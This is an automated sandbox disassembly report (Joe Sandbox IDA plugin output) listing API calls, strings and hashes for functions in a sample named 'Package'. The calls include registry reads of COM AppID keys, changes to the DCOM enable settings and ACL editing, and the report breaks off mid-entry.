#861.MFC42U(ViewHiddenComCats,?,?,?,00000008,00000004,23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC3F
#6398.MFC42U(?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920,?,?,?,?,?,00D404CF), ref: 00D2EC4F
#861.MFC42U(ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC5C
#6398.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC6C
#800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC74
#800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC7C
#800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC84
#652.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC8B

Strings

ViewHiddenComCats, xrefs: 00D2EC37
ExpertMode, xrefs: 00D2EC54

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #6398#800$#4155#540#861$#652
String ID: ExpertMode$ViewHiddenComCats
API String ID: 800799730-816868219
Opcode ID: 0cee52d62504910397a95696aba08573b7c7bf7ecaf2c912e29ce854417550bc
Instruction ID: 6146b6ed3b900e2a277e91171fb1bd6773d945df4ebd5b03642c1c40ad20879c
Opcode Fuzzy Hash: 0cee52d62504910397a95696aba08573b7c7bf7ecaf2c912e29ce854417550bc
Instruction Fuzzy Hash: 24216D35A40619ABCB19EB50DC52EBEBBB6FF54700F000528B552772E1DBB46E04CB30

Function 00D3C8A3 Relevance: 25.6, APIs: 17, Instructions: 108COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001,?,?,00D3BA6A,?), ref: 00D3C8C5
OpenProcessToken.ADVAPI32(00000000,?,00D3BA6A,?), ref: 00D3C8CC
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00D3BA6A,?,00D3BA6A,?), ref: 00D3C8E7
GetLastError.KERNEL32(?,00D3BA6A,?), ref: 00D3C8ED
CloseHandle.KERNEL32(?,00D3BA6A,?), ref: 00D3C921

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
String ID:
API String ID: 2078281146-0
Opcode ID: 64757299754aad969bf740453b0b792ac6df4b055c7d704f1b8ab1f96417dac9
Instruction ID: 654802625287aadbb4b92f7dfd8766da2cead2408cf6a0af84a557eb4b048f30
Opcode Fuzzy Hash: 64757299754aad969bf740453b0b792ac6df4b055c7d704f1b8ab1f96417dac9
Instruction Fuzzy Hash: EF31C13A510215EFCB115FA4EC08B6E7BB9EF4A312F265026F941F6260DB3489909FB0

Function 00D2C070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 75windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2C086
#4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo,Access Permissions,00000004), ref: 00D2C09E
LoadCursorW.USER32(00000000,00007F02), ref: 00D2C0B3
SetCursor.USER32(00000000), ref: 00D2C0BA
SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2C0EA
#2634.MFC42U(00000000), ref: 00D2C0F7
#2634.MFC42U(00000000,00000000), ref: 00D2C103
LoadCursorW.USER32(00000000,00007F00), ref: 00D2C10E
SetCursor.USER32(00000000), ref: 00D2C115
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C12D
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C13D

Strings

Access Permissions, xrefs: 00D2C092
Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo, xrefs: 00D2C097
AccessPermission, xrefs: 00D2C0C0

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CursorMessageSend$#2634Load$#4219
String ID: Access Permissions$AccessPermission$Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo
API String ID: 2901272449-2859256857
Opcode ID: 572584b09168810b351e9b48ccd47c47fbd944758adffddd27ed4148476dc8f5
Instruction ID: 11b50099079462d07c64fba5c0d0b4f73f7110dd057d1fc7ec800d5b21eb63af
Opcode Fuzzy Hash: 572584b09168810b351e9b48ccd47c47fbd944758adffddd27ed4148476dc8f5
Instruction Fuzzy Hash: 7511A232140720BBEB216F61EC8EFE73B29DF97B65F114074BA05D9196CBA51845C6B0

Function 00D35601 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 172registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000000,AppID,00000000), ref: 00D35653
RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000100), ref: 00D3569A
wsprintfW.USER32 ref: 00D35754
RegQueryValueW.ADVAPI32(80000000,?,?,00000100), ref: 00D35777
CLSIDFromString.OLE32(00000000,-00000008), ref: 00D357CF
lstrcpyW.KERNEL32(-00000084,?), ref: 00D3584A
lstrlenW.KERNEL32(?), ref: 00D358A8
wsprintfW.USER32 ref: 00D358C5
RegCloseKey.ADVAPI32(00000000), ref: 00D358FE

Strings

AppID\%s, xrefs: 00D35748
AppID, xrefs: 00D35649
[AppID: %s], xrefs: 00D358B9
', xrefs: 00D35870

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: wsprintf$CloseEnumFromOpenQueryStringValuelstrcpylstrlen
String ID: '$AppID$AppID\%s$[AppID: %s]
API String ID: 1953670596-3682975055
Opcode ID: f3a10f0a93ead08e15be30c4a80a0ab3963e894e6e3c21142491065a81b22d42
Instruction ID: 1afd996e66f4569fc6a98f2a7bf1b3defc38756eb6ab3da33ee8dbec28ac3961
Opcode Fuzzy Hash: f3a10f0a93ead08e15be30c4a80a0ab3963e894e6e3c21142491065a81b22d42
Instruction Fuzzy Hash: 2781B2B5900A2C9FDB60CF54EC45BEABBB8BB09316F1045E9E509E6290D7749BC4CF60

Function 00D2E466 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E482
#6211.MFC42U(00000005,?,?,?,?,?,00D2E130,?,?), ref: 00D2E49B
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00D2E4AA
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E4BE

Part of subcall function 00D2E583: #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E5BE
Part of subcall function 00D2E583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E669

SendMessageW.USER32(?,00001308,00000001,00000000), ref: 00D2E4DA
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E4ED
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E504
SendMessageW.USER32(?,0000133E,00000000,?), ref: 00D2E528
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D2E53B
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00D2E555
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00D2E130,?,?), ref: 00D2E569
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00D2E130,?,?), ref: 00D2E578

Strings

Registry, xrefs: 00D2E521

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$RedrawWindow$#6211
String ID: Registry
API String ID: 2246854860-886996828
Opcode ID: 90c27999a25e0c2ae2c810881859ea10fd27a594414eda18524277c37d25f620
Instruction ID: e29276208a352a64217c018421fe45d233d6a6fe0ab018d7b7cd5771542c89f5
Opcode Fuzzy Hash: 90c27999a25e0c2ae2c810881859ea10fd27a594414eda18524277c37d25f620
Instruction Fuzzy Hash: 0B2130B5504B08BFFA211F70DC89EAB7AADFB4A749F414414F26A911A0D7B53D418AB0

Function 00D2F346 Relevance: 22.6, APIs: 15, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D2F34D
#324.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F35E
#567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F375
#567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F38F
#567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3AA
#567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3C0
#567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3DA
#540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3EF
#540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F400
#540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F40F
#540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F420
#861.MFC42U(00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F436
#861.MFC42U(00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F442
#861.MFC42U(00D221A0,00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F453
#861.MFC42U(00D221A0,00D221A0,00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F45F

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #567$#540#861$#324H_prolog3
String ID:
API String ID: 1167559088-0
Opcode ID: 332da30f99cc25c7912327402d3a42583ace422d1ff6273bab53ec275c43ef2a
Instruction ID: 967b60752a9aaa0ad1f877d8f33e21645d0bb013f889ba8100715f50106670e2
Opcode Fuzzy Hash: 332da30f99cc25c7912327402d3a42583ace422d1ff6273bab53ec275c43ef2a
Instruction Fuzzy Hash: DB314971A0179AEBDB15EB64C9027ECBBA0AF64304F50405CA5812B3C2DBF42B09CBF1

Function 00D3B680 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 124windowstringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D3D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D70D
Part of subcall function 00D3D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00D3D6E4,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D72C
Part of subcall function 00D3D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00D3D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00D3D738

lstrcmpiW.KERNEL32(?,00D22778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00D3B6E0
lstrcmpiW.KERNEL32(?,00D22778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00D3B726
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3B749
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3B76E
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3B7B1
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3B7DC
#5273.MFC42U(80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,00D22778), ref: 00D3B809
#1197.MFC42U(These changes will take effect after you restart your computer.,00000000,00000000), ref: 00D3B81F

Strings

These changes will take effect after you restart your computer., xrefs: 00D3B81A
EnableRemoteConnect, xrefs: 00D3B702, 00D3B7F0
EnableDCOM, xrefs: 00D3B6BA, 00D3B782
SOFTWARE\MICROSOFT\OLE, xrefs: 00D3B6BF, 00D3B707, 00D3B787, 00D3B7F5

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$lstrcmpi$#1197#5273CloseOpenQueryValue
String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE$These changes will take effect after you restart your computer.
API String ID: 2271089683-166272277
Opcode ID: d743d9928ff7be574a9b36d0b7b3966ce0adee04a6e79a28ec94a8cb01e20239
Instruction ID: 60e17cd2a58d25c8eb96e22dbe4a191c302e19cfec4e5726105e3c15b8a5a1d6
Opcode Fuzzy Hash: d743d9928ff7be574a9b36d0b7b3966ce0adee04a6e79a28ec94a8cb01e20239
Instruction Fuzzy Hash: 2741F9B0780325BAEB305B20EC87F7A7369EB11B18F150126FB14F50C2D7B0AD498A74

Function 00D3F1A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 70libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00D43B00,00000FA0), ref: 00D3F1B0
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 00D3F1BB
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D3F1CC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D3F1DE
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D3F1EC
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00D3F21E
DeleteCriticalSection.KERNEL32(00D43B00,00000007), ref: 00D3F245
CloseHandle.KERNEL32(00000000), ref: 00D3F255

Strings

SleepConditionVariableCS, xrefs: 00D3F1D8
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D3F1B6
kernel32.dll, xrefs: 00D3F1C7
WakeAllConditionVariable, xrefs: 00D3F1E4

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 80cad4e2c6a5820495b64a6c368960cac7791ffdb10fc8914f4cb0a6a71142c6
Instruction ID: 712fcbb39f3d99f78aa23ac5d9d09158548f4ece849c2b08f1a6032f16957f1e
Opcode Fuzzy Hash: 80cad4e2c6a5820495b64a6c368960cac7791ffdb10fc8914f4cb0a6a71142c6
Instruction Fuzzy Hash: 1301A13DE45721ABC7215FB8BC1DF2B3AA8EB96B55F080020F904E2350DE60CD408AB5

Function 00D2F290 Relevance: 21.0, APIs: 10, Strings: 2, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2F29A
lstrcpyW.KERNEL32(?,Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|,00000548), ref: 00D2F2AD
#355.MFC42U(00000001,00000000,00D221A0,00001804,?), ref: 00D2F2D0
#2507.MFC42U ref: 00D2F2E8
#3494.MFC42U(?), ref: 00D2F2FF
#858.MFC42U(00000000,?), ref: 00D2F30F
#800.MFC42U(00000000,?), ref: 00D2F31D
#6330.MFC42U(00000000,00000000,?), ref: 00D2F325
#800.MFC42U ref: 00D2F330
#641.MFC42U ref: 00D2F33B

Strings

Open COM Surrogate Server, xrefs: 00D2F2DE
Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|, xrefs: 00D2F2A1

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
String ID: Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|$Open COM Surrogate Server
API String ID: 2485399651-276578773
Opcode ID: e3409fb5fa26ef1284832fd5ce39e5bcf15abaf1eed6671e5e07edb2683383e6
Instruction ID: 92c8907c30ddd686ee604db25adf9791eccc1b7804c07e60cee93083ac9f45a1
Opcode Fuzzy Hash: e3409fb5fa26ef1284832fd5ce39e5bcf15abaf1eed6671e5e07edb2683383e6
Instruction Fuzzy Hash: 08011E71940628AEDB14EB54DC91AEEB768EF25309F8004E9F545A31C1DFB45F88CE71

Function 00D2EF20 Relevance: 21.0, APIs: 10, Strings: 2, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2EF2A
lstrcpyW.KERNEL32(?,Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|,00000548), ref: 00D2EF3D
#355.MFC42U(00000001,00000000,00D221A0,00001804,?), ref: 00D2EF60
#2507.MFC42U ref: 00D2EF78
#3494.MFC42U(?), ref: 00D2EF8F
#858.MFC42U(00000000,?), ref: 00D2EF9F
#800.MFC42U(00000000,?), ref: 00D2EFAD
#6330.MFC42U(00000000,00000000,?), ref: 00D2EFB5
#800.MFC42U ref: 00D2EFC0
#641.MFC42U ref: 00D2EFCB

Strings

Open COM Server, xrefs: 00D2EF6E
Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|, xrefs: 00D2EF31

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
String ID: Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|$Open COM Server
API String ID: 2485399651-2085683529
Opcode ID: fe3b0ef16ca7aaf5a30629d162d5f5400987b11625956357dd4dfafb77c25bbc
Instruction ID: 8f56b6558aaf5d13e4cb8398bf95086742d6aee83884db5e0896e7d0f9f8d9e6
Opcode Fuzzy Hash: fe3b0ef16ca7aaf5a30629d162d5f5400987b11625956357dd4dfafb77c25bbc
Instruction Fuzzy Hash: 0C011E71940A28AEDB14EB94DC91AEEB769EF24309F8000E9B145A21C1DFB45F88CE71

Function 00D3BF00 Relevance: 18.2, APIs: 12, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D3BF47
GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D3BF51
GetExplicitEntriesFromAclW.ADVAPI32(?,?,?), ref: 00D3BF7F
SetEntriesInAclW.ADVAPI32(?,?,00000000,?), ref: 00D3BF94
MakeAbsoluteSD.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00D3BFBD
MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D3C018
SetSecurityDescriptorDacl.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D3C030
MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D3C044
LocalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D3C053
MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D3C065
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00D3C0A0

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Make$AbsoluteDaclDescriptorEntriesLocalRelativeSecuritySelf$AllocErrorExplicitFreeFromLast
String ID:
API String ID: 559786115-0
Opcode ID: 9cab04980193d7f4f1d48db11491ff49ecbbf54e4d277a9f7f7d5424beb70e5e
Instruction ID: 23978a0d7f30930ab60209a594f81afff04f33a76823f9529128ba9bb143ad73
Opcode Fuzzy Hash: 9cab04980193d7f4f1d48db11491ff49ecbbf54e4d277a9f7f7d5424beb70e5e
Instruction Fuzzy Hash: 9551B4B6A00219AF9B11DF95DC85EEFBBBCEF09750F144026FA05E2220D7359A54CBB0

Function 6E2F5DA3 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

PATH, xrefs: 6E2F5E7A, 6E2F5E80
\, xrefs: 6E2F5F1D

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID: PATH$\
API String ID: 485612231-1896636505
Opcode ID: f82299104a77c2c5a50e79c4a8c93896d0bcd124638be090077f1526253c0060
Instruction ID: 7171231c11d6ab5b874927b3817a5f7679386dec22e6ddfafda69257cb4d5639
Opcode Fuzzy Hash: f82299104a77c2c5a50e79c4a8c93896d0bcd124638be090077f1526253c0060
Instruction Fuzzy Hash: E791D5719E820FDFEB158BE4CC91BEEF7BBEF01316F204519D420A6181EBB589438695

Function 00D30BBB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D30BE4

Part of subcall function 00D3D2F7: wsprintfW.USER32 ref: 00D3D35B
Part of subcall function 00D3D2F7: lstrcatW.KERNEL32(?,00D260AC), ref: 00D3D376
Part of subcall function 00D3D2F7: lstrcatW.KERNEL32(?,?), ref: 00D3D37E

Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F

#2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00D30C33
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D30C46
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D30C57
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D30C6F
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D30C80
UpdateWindow.USER32(?), ref: 00D30C8C
#2634.MFC42U(00000001), ref: 00D30C9A
#2634.MFC42U(00000001,00000001), ref: 00D30CA3

Strings

LaunchPermission, xrefs: 00D30C07

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#2634$lstrcat$#540#800CloseH_prolog3_OpenQueryUpdateValueWindowwsprintf
String ID: LaunchPermission
API String ID: 2454494747-4257139491
Opcode ID: fb612941511b827aeaa69bd89f645dd62b3fcaadae0de99ef451d07ac0bb8794
Instruction ID: 0d50426caf1758c544315cff115809df126107dc8be6f86f6b1c0dac10bb3111
Opcode Fuzzy Hash: fb612941511b827aeaa69bd89f645dd62b3fcaadae0de99ef451d07ac0bb8794
Instruction Fuzzy Hash: 31216035640314ABEB21AF21DC4AFE63B69DF46740F454070BE09AE1D2CBB16985C7B0

Function 00D37B91 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 65registrystringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,aut32.dll), ref: 00D37B9C
